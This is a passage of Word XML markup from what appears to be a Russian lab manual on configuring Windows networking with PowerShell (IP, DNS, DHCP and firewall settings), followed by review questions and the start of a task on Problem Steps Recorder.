    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Отображение сведений о TCP/IP системы. Команда Get-NetIPConfiguration позволяет отобразить текущие параметры протокола TCP/IP системы. Можно увидеть текущие адреса IPv4 и IPv6, адрес шлюза и его состояние, а также адреса DNS-сервера. Для этого существует следующая команда:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-NetIPConfiguration -Detailed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Переименование сетевого адаптера. С помощью PowerShell 3.0 можно переименовать сетевой адаптер. Однако для этого, как и для изменения других параметров сети, необходимо обладать правами администратора. Изменять имя сетевого адаптера позволяет следующая команда:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename-NetAdapter -Name </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ethernet</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -NewName </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Public</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Установка нового статического IP-адреса. Чтобы для сетевого адаптера по имени Ethernet задать IP-адрес 192.168.100.115 и адрес шлюза 192.168.100.1, воспользуйтесь приведенной ниже командой, которая особенно удобна при настройке Windows Server Core:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$netadapter = Get-NetAdapter -Name Ethernet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$netadapter | New-NetIPAddress -IPAddress 192.168.100.115</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PrefixLength</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 24 –</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DefaultGateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.100.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Установка нового адреса DNS-сервера. При изменении IP-адреса системы часто приходится изменять адреса DNS-серверов. В приведенном ниже примере показано, как с помощью команды Set-DNSClientServerAddress можно выполнить настройку сетевого адаптера с адресом DNS-сервера 192.168.100.8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$netadapter = Get-NetAdapter -Name Ethernet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$netadapter | Set-DNSClientServerAddress -ServerAddresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.100.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Настройка сетевого адаптера на использование </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-адресации. PowerShell можно задействовать для настройки системы на использование адресов, назначаемых DHCP. Эта команда предписывает применять DHCP-адресацию для IP-адреса сетевого адаптера Ethernet:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$netadapter = Get-NetAdapter -Name Ethernet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$netadapter | Set-NetIPInterface -Dhcp Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Настройка интерфейса Ethernet на использование адреса DNS, назначаемого DHCP. Переход на DHCP-адресацию обычно требует и перехода на динамическое назначение адреса DNS-сервера. Эта команда предписывает интерфейсу Ethernet использовать назначаемый DHCP адрес DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$netadapter = Get-NetAdapter -Name Ethernet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$netadapter | Set-DnsClientServerAddress -InterfaceIndex 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-ResetServerAddresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавление</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>правила</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>брандмауэра</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подобно тому, как Netsh работает с сетевыми настройками системы и параметрами брандмауэра Windows, приведенная ниже команда PowerShell позволяет настроить брандмауэр Windows на удаленное управление:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-NetFirewallRule -DisplayGroup </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows Firewall Remote</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Enabled True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Включение</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>выключение</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>брандмауэра</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основная</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>команда</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Server – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>команда</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>включения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>выключения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>брандмауэра</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приведенные ниже команды иллюстрируют возможность выполнения этой операции с помощью PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое серверная операционная система?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое PowerShall?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Для чего используется PowerShall?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="00F16A4D" w:rsidP="00F16A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc507788248"/>
      <w:bookmarkStart w:id="181" w:name="_Toc507788523"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 3. </w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использова</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ть</w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Problem Steps Recorder для решения проблем настройки программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00F16A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться использовать Problem Steps Recorder для решения проблем настройки программного </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="113"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 7 включает в себя новую систему </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Steps Recorder (PSR)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, которая может записывать все действия, выполнение которых пользователем порождает проблему. PSR можно запустить, перейдя в меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
